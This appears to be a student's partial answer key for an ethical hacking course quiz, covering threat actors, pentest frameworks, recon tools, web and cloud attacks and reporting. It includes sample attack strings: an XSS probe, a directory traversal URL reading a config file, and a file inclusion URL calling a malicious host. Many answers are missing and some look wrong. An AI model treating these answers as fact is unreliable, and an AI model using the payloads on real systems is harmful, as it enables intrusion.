Ethical Hacker
Ethical Hacker
Which three internet job boards allow filtering job postings by seniority or experience level?
(Choose all that apply.)
● glassdoor.com
● indeed.com
● linkedin.com jobs
Protego has been contracted to do a network infrastructure test as part of a broader
penetration testing engagement. What will you be targeting in this test? (Choose all
that apply.)
● switches
● IPS devices
● AAA servers
Under what tactic in the MITRE ATT&CK matrix would you find the information
gathering stage of the Operation Dream Job procedure?
● Reconnaissance.
You need to setup a penetration testing practice lab because some of the tools that
are preferred at Protego are new to you. What best practices will you follow as you
setup your lab? (Choose all that apply.)
You have just downloaded and installed VirtualBox or UTM. You start the
application, but you do not see the Kali VM running. What step did you forget?
- You must download and import or run the Kali VM file in VirtualBox or UTM
You have just started Kali and open a terminal from the panel. What will the
response be when you enter the pwd command at the prompt?
-home/kali
a person who uses different tools than nonethical hackers to find vulnerabilities
and exploit targets
a person that is financially motivated to find vulnerabilities and exploit targets
a person that is looking to make a point or to promote what they believe
a person who mimics an attacker to evaluate the security posture of a network
Question 2
Which threat actor term describes a well-funded and motivated group that will use
the latest attack techniques for financial gain?
hacktivist
state-sponsored attacker
organized crime
insider threat
Question 3
Which type of threat actor uses cybercrime to steal sensitive data and reveal it
publicly to embarrass a target?
qorganized crime
hacktivist
insider threat
state-sponsored attacker
Question 4
An attack perpetrated by a well-funded and motivated group that will typically use
the latest attack techniques for financial gain.
An attack perpetrated by governments worldwide to disrupt or steal information
from other nations.
An attack perpetrated by disgruntled employees inside an organization.
An attack is perpetrated to steal sensitive data and then reveal it to the public to
embarrass or financially affect a target.
Question 5
An attack perpetrated by a well-funded and motivated group that will typically use
the latest attack techniques for financial gain.
An attack perpetrated by governments worldwide to disrupt or steal information
from other nations.
An attack perpetrated by disgruntled employees inside an organization.
An attack is perpetrated to steal sensitive data and then reveal it to the public to
embarrass or financially affect a target.
Question 6
firewall security
logic flaws
wireless deployment
data integrity between a client and a cloud provider
Question 7
What two resources are evaluated by a network infrastructure penetration test?
(Choose two.)
AAA servers
CSPs
web servers
IPSs
back-end databases
Question 8
AAA servers
cloud services
switches, routers, and firewalls
back-end databases
Question 9
The tester must test the electrical grid supporting the infrastructure of the target.
The tester is provided with a list of domain names and IP addresses in the scope
of a particular target.
The test is a hybrid approach between unknown and known environment tests.
The tester should not have prior knowledge of the organization and infrastructure
of the target.
Question 11
Which type of penetration test would only provide the tester with limited information
such as the domain names and IP addresses in the scope?
known-environment test
partially known environment test
unknown-environment test
OWASP Web Security Testing Guide
Question 13
Categories:
PTES: provides information about types of attacks and methods
MITRE ATT&CK: collection of different matrices of tactics and techniques that
adversaries use while preparing for an attack
OWASP WSTG: covers the high-level phases of web application security testing
NIST SP 800-115: provides organizations with guidelines on planning and
conducting information security testing
OSSTMM: lays out repeatable and consistent security testing
Question 14
Which three options are phases in the Penetration Testing Execution Standard
(PTES)? (Choose three.)
Threat modeling
Penetration
Reporting
Enumerating further
Network mapping
Exploitation
Question 15
Which two options are phases in the Information Systems Security Assessment
Framework (ISSAF)? (Choose two.)
Pre-engagement interactions
Maintaining access
Reporting
Post-exploitation
Vulnerability identification
Question 16
Which two options are phases in the Open Source Security Testing Methodology
Manual (OSSTMM)? (Choose two.)
Vulnerability Analysis
Maintaining Access
Work Flow
Network Mapping
Trust Analysis
Question 17
MITRE ATT&CK
OWASP WSTG
NIST SP 800-115
OSSTMM
Question 18
Which option is a Linux distribution that includes penetration testing tools and
resources?
OWASP
PTES
SET
BlackArch
Question 19
vmware.com
attack.mitre.org
parrotsec.org
virtualbox.org
Question 20
The tester needs to be sure that a lack of resources is not the cause of false
results.
The tester needs to be able to determine the causes when something crashes.
The tester needs to ensure controlled access to and from the lab environment and
restricted access to the internet.
The tester validates a finding running the same test with a different tool to see if
the results are the same.
Question 21
Which tools should be used for testing the server and client platforms in an
environment?
Payment Card Industry Data secures the processing of credit card and
Security Standard (PCI DSS) other types of digital payments
Answer: HIPAA
Question 2
Answer: FedRAMP
Question 3
Answer: GDPR
Question 4
Question 5
Question 6
Question 7
Question 8
Answers:
● CAV2/CVC2/CVV2/CID
● full magnetic strip data or equivalent data on a chip
Question 9
● Part 1: General — provides general guidance and best practices for the
management of cryptographic keying material.
● xPart 2: Best Practices for Key Management Organization — provides
guidance on policy and security planning requirements for U.S.
government agencies.
● xPart 3: Application Specific Key Management Guidance — provides
guidance when using the cryptographic features of current systems.
Question 10
Answer: documentation of permission for performing the tests from the client
institutions
Question 11
Question 12
Question 13
Question 14
Answer: contract
Question 15
Answer: disclaimers
Question 16
Answers:
● testing timeline
● location of testing
● preferred method of communication
Question 17
Question 18
Question 20
Question 21
Question 22
Question 23
Answers:
● PGP
● S/MIME
Question 24
Answer: This type of testing is where the consultant will be provided with very
limited information about the targeted systems and network.
Question 25
Limiting the use of tools used in Specifying the allowed, or disallowed, testing
a particular penetration test tools.
j
3.5
Question 1
Which two tools could be used to gather DNS information passively? (Choose
two.)
● Recon-ng
● Dig
Question 2
Question 3
Which specification defines the format used by image and sound files to
capture metadata?
Question 4
Question 5
What type of server is a penetration tester enumerating when they enter the
nmap -sU command?
Question 6
Question 7
Question 8
Question 9
Question 10
What is the purpose of host enumeration when beginning a penetration test?
Question 11
What can be deduced when a tester enters the nmap -sF command to perform
a TCP FIN scan and the target host port does not respond?
Question 12
Question 13
Question 14
Question 15
Question 16
Question 17
Question 18
Question 19
Question 20
A penetration tester must run a vulnerability scan against a target. What is the
benefit of running an authenticated scan instead of an unauthenticated scan?
Question 21
Question 22
Question 23
Question 24
What is the advantage of using the target Wi-Fi network for reconnaissance
packet inspection?
Question 25
Question 1
● Answer: NetBIOS-SSN
Question 2
Match the port type and number with the respective NetBIOS protocol service.
Question 3
What two features are present on DNS servers using BIND 9.5.0 and higher
that help mitigate DNS cache poisoning attacks? (Choose two.)
● Answer:
○ randomization of ports
○ provision of cryptographically secure DNS transaction identifiers
Question 4
What UDP port number is used by SNMP protocol?
● Answer: 161
Question 5
Question 6
Which Kali Linux tool or script can gather information on devices configured
for SNMP?
● Answer: snmp-check
Question 7
Question 8
Which two best practices would help mitigate FTP server abuse and attacks?
(Choose two.)
● Answer:
○ limit anonymous logins to a select group of people
○ require re-authentication of inactive sessions
Question 9
Question 10
Question 11
● Reflected DOS (A) - This attack uses spoofed packets that appear to be
from the victim. Then the sources become unwitting participants in the
attack by sending the response traffic back to the intended victim.
● DNS Amplification (B) - This an attack in which the attacker exploits
vulnerabilities in target servers to initially turn small queries into much
larger payloads, which are used to bring down the servers of the victim.
● Direct DOS (C) - This occurs when the source of the attack generates the
packets, regardless of protocol, application, and so on, that are sent
directly to the victim of the attack.
● DDOS (D) - This attack uses botnets that can be manipulated from a
command and control (CnC, or C2) system.
Question 12
Question 13
● Answer: Airmon-ng
Question 14
● Answer: WPS
Question 16
What does the MFP feature in the 802.11w standard do to protect against
wireless attacks?
Question 17
Question 18
Match the TCP port number with the respective email protocol that uses it.
Question 19
● Answer: 25
Question 20
● Answer: Kerberoasting
Question 22
Which four items are needed by an attacker to create a silver ticket for a
Kerberos silver ticket attack? (Choose four.)
● Answer:
○ hash value
○ system account
○ FQDN
○ target service
Question 23
● Answer: On-path
Question 24
● Answer: DAI
Question 25
● Answer: amplification
6.13
Question 1
Which two functions are provided by a web proxy device? (Choose two.)
Question 2
Match the HTTP status code contained in a web server response to the description.
Question 3
Match the elements in the URL
ftp://xyz-company.com:2457/support/file;id=65?name=intro&r=true
to the description.
● xyz-company.com: Host
● 2457: Port
● support/file: Path
● ftp: Scheme
● name=intro&r=true: Query-string
● id=65: Path-segment-params
Question 4
Which function is provided by HTTP 2.0 to improve performance over HTTP 1.1?
● HTTP 2.0 provides HTTP message multiplexing and requires fewer messages
to download web content.
Question 5
Why should application developers change the session ID names used by common
web application development frameworks?
Question 6
Which mechanism is used by a shopping site to securely maintain user
authentication during shopping?
● Session ID
Question 7
What is the best mitigation approach against session fixation attacks?
Question 8
Which two attributes can be set in a web application cookie to indicate it is a
persistent cookie? (Choose two.)
● Expires
● Max-Age
Question 9
Which international organization is dedicated to educating industry professionals,
creating tools, and evangelizing best practices for securing web applications and
underlying systems?
Question 10
Which component in the statement below is most likely user input on a web form?
SELECT * FROM group WHERE attack = ‘network’ AND a-type LIKE
‘ping%’;
● Ping
Question 11
Which statement describes an example of an out-of-band SQL injection attack?
● An attacker launches the attack on a web site and forces the web application
to send the query results via an email.
Question 12
A threat actor launches an SQL injection attack by sending multiple specific
statements and reconstructing the key information. What type of attack is this?
● In-band
Question 13
Which technique exploits SQL injection vulnerability by making the application
perform multiple SELECT queries?
● Union operator
Question 14
Which type of SQL query is in the SQL statement select * from users where
user = "admin";?
● Static query
Question 15
Which type of penetration testing can be used to verify the configuration of Microsoft
Active Directory?
● LDAP injection
Question 16
What is a potentially dangerous web session management practice?
● It forces the web browser to have the cookies processed only by the server.
Question 18
Which threat does a security policy that configures routers and switches with
advanced security measures mitigate?
Question 19
What type of vulnerability does the attacker try to exploit with the following request:
https://portal.a-univ.edu/?
search=students&results=50&search=staff?
Question 20
Where would a tester use the string <script>alert("XSS Test
Now")</script> to test for cross-site scripting vulnerabilities?
Question 21
According to OWASP, which three rules help prevent XSS attacks? (Choose three.)
● Use HTML escape before inserting untrusted data into HTML element
content.
● Use attribute escape before inserting untrusted data into HTML common
attributes.
● Use JavaScript escape before inserting untrusted data into JavaScript data
values.
Question 22
Which type of web vulnerability is being exploited by the attacker using the following
URL: http://192.168.46.82:45/vulnerabilities/fi/?
page=../../../../../etc/httpd/httpd.conf?
● Directory traversal
Question 23
Which type of vulnerability did the attacker try to exploit using the following URL:
http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.o
rg/cookie.html?
Question 24
Which insecure code practice enables a catastrophic threat where an attacker
compromises the application or system?
● Use of hard-coded credentials
Question 25
What is the best practice to mitigate vulnerabilities from a lack of proper error
handling in an application?
Question 1
Question 2
Question 3
Question 4
Question 5
Which cloud technology attack method could a threat actor use to access a
user or application account that allows access to more accounts and
information?
Answer: account takeover
Question 6
Which tool could be used to find vulnerabilities that could lead to metadata
service attacks?
Answer: Dagda
Question 7
Question 8
Which cloud technology attack method would require the threat actor to create
a malicious application and install it into a SaaS, PaaS, or IaaS environment?
Answer: cloud malware injection attack
Question 9
Question 10
A threat actor has compromised a VM in a cloud environment that shares the
same physical hardware as non-compromised VMs. Which cloud technology
attack method could now be used to exfiltrate credentials, cryptographic keys,
and other sensitive information?
Answer: side-channel attack
Question 11
Question 12
Question 13
Question 14
Question 15
Question 16
Which two IoT systems should never be exposed to the Internet? (Choose
two.)
Question 17
Question 18
Question 19
Which tool is a set of open-source analysis tools that uses the ClamAV
antivirus engine to help detect vulnerabilities, Trojans, backdoors, and
malware in Docker images and containers?
Answer: Clair
Question 20
Which credential harvesting tool could be used to send a spear phishing email
with a link to a malicious site to a target victim?
Answer: Social-Engineer Toolkit (SET)
Question 21
Why do cloud architectures help minimize the impact of DoS or DDoS attacks
compared to hosting services on-premise?
Answer: cloud providers use a distributed architecture
Question 22
Question 23
Question 24
Question 25
Which tool is an open-source container vulnerability scanner that can be used
to find vulnerabilities in a Docker image?
Answer: Anchore’s Grype
9.5
Question 1:
Which industry-standard method has created a catalog of known vulnerabilities that
provides a score indicating the severity of a vulnerability?
● CVSS
Question 2:
Which vulnerability catalog creates a list of publicly known vulnerabilities, each
assigned an ID number, description, and reference?
● CVE
Question 3:
Match the CVSS metric group with the respective information.
Question 4:
Which three items are included in the base metric group used by CVSS? (Choose
three.)
● Attack complexity
● Integrity impact
● User interaction
Question 5:
Which item is included in the environmental metric group used by CVSS?
● Confidentiality requirements
Question 6:
Which item is included in the temporal metric group used by CVSS?
Question 7:
Which tool can ingest the results from many penetration testing tools a cybersecurity
analyst uses and help this professional produce reports in formats such as CSV,
HTML, and PDF?
● Dradis
Question 8:
Match the description to the respective control category.
Question 9:
Which two items are examples of technical controls that can be recommended as
mitigations and remediation of the vulnerabilities found during a pen test? (Choose
two.)
● Multifactor authentication
● Certificate management
Question 10:
A recent pen-test results in a cybersecurity analyst report, including information on
process-level remediation, patch management, and secrets management solutions.
Which control category is represented by this example?
● Operational
Question 11:
Which document provides several cheat sheets and detailed guidance on preventing
vulnerabilities such as cross-site scripting, SQL injection, and command injection?
● OWASP
Question 12:
A cybersecurity analyst report should contain minimum password requirements and
policies and procedures. These are examples that are included in which control
category?
● Administrative
Question 13:
Which control category includes information on mandatory vacations and user
training in the cybersecurity analyst report?
● Administrative
Question 14:
When creating a cybersecurity analyst report, which control category includes
information concerning the access control vestibule?
● Physical
Question 15:
Match the term to the respective description.
● A: False positive: A security device triggers an alarm, but there is no
malicious activity or actual attack taking place
● B: True positive: A successful identification of a security attack or a malicious
event
● C: False negative: Malicious activities that are not detected by a network
security device
● D: True negative: An intrusion detection device identifies an activity as
acceptable behavior and the activity is acceptable
Question 16:
Which kind of event is also called a "benign trigger"?
● False positive
Question 17:
What kind of events diminishes the value and urgency of real alerts?
● False positives
Question 18:
Which kinds of events are malicious activities not detected by a network security
device?
● False negatives
Question 19:
Which kind of event occurs when an intrusion detection device identifies an activity
as acceptable behavior and the activity is acceptable?
● True negative
Question 20:
Which kind of event is a successful identification of a security attack?
● True positive
Question 21:
Which example of technical control is recommended to mitigate and prevent
vulnerabilities such as cross-site scripting, cross-site request forgery, SQL injection,
and command injection?
Question 22:
Which example of administrative controls enables administrators to control what
users can do at both broad and granular levels?
● RBAC
Question 23:
A document entitled "Building an Information Technology Security Awareness and
Training Program" succinctly defines why security education and training are so
important for users. The document defines ways to improve the security operations
of an organization. Which document is being described?
● NIST SP 800-50
Question 24:
How is the score that CVSS provides interpreted?
● Scores are rated from 0 to 10, with 10 being the most severe
Question 25:
What control category does system hardening belong to?
● Technical
10.3
Question 1
● Conditionals
● Boolean operators
Question 2
● Arrays
● Lists
Question 3
● Subroutines
● Message templates
Question 4
Question 5
● Array
Question 6
● Data structures
Question 7
python
Copy code
cves = ['CVE-2022-0945', 'CVE-2023-1234', 'CVE-2022-0987']
● List
Question 8
Question 9
Question 10
Which domain name database query utility has been restricted by the
European Union´s General Data Protection Regulation (GDPR) to protect
privacy?
● Whois
Question 11
What are two tools that can be used to perform active reconnaissance?
(Choose two.)
● Zenmap
● Maltego
Question 12
What are two tools that can be used to perform credential attacks? (Choose
two.)
● Mimikatz
● Patator
Question 13
Which Linux distribution comes with more than 1900 security penetration
testing tools?
● Kali Linux
Question 14
● ExifTool
Question 15
● Function
Question 16
Which tool organizes query entities within the Entity Palette and calls the
search options "transforms"?
● Maltego
Question 17
● Class
Question 18
● Censys
Question 19
● Bash
Question 20
● Kali Linux
Question 21
● Qualys
Question 22
Which option is a PowerShell-based post-exploitation tool that can maintain
persistence on a compromised system and run PowerShell agents without the
need for powershell.exe?
● Empire
Question 23
Which tool can be used with Metasploit to maintain stealth and avoid detection
from security controls implemented by an organization?
● Veil
Question 24
Which encoding method can secretly exfiltrate confidential data in the payload
of DNS packets?
● Base64
Question 25
● CAINE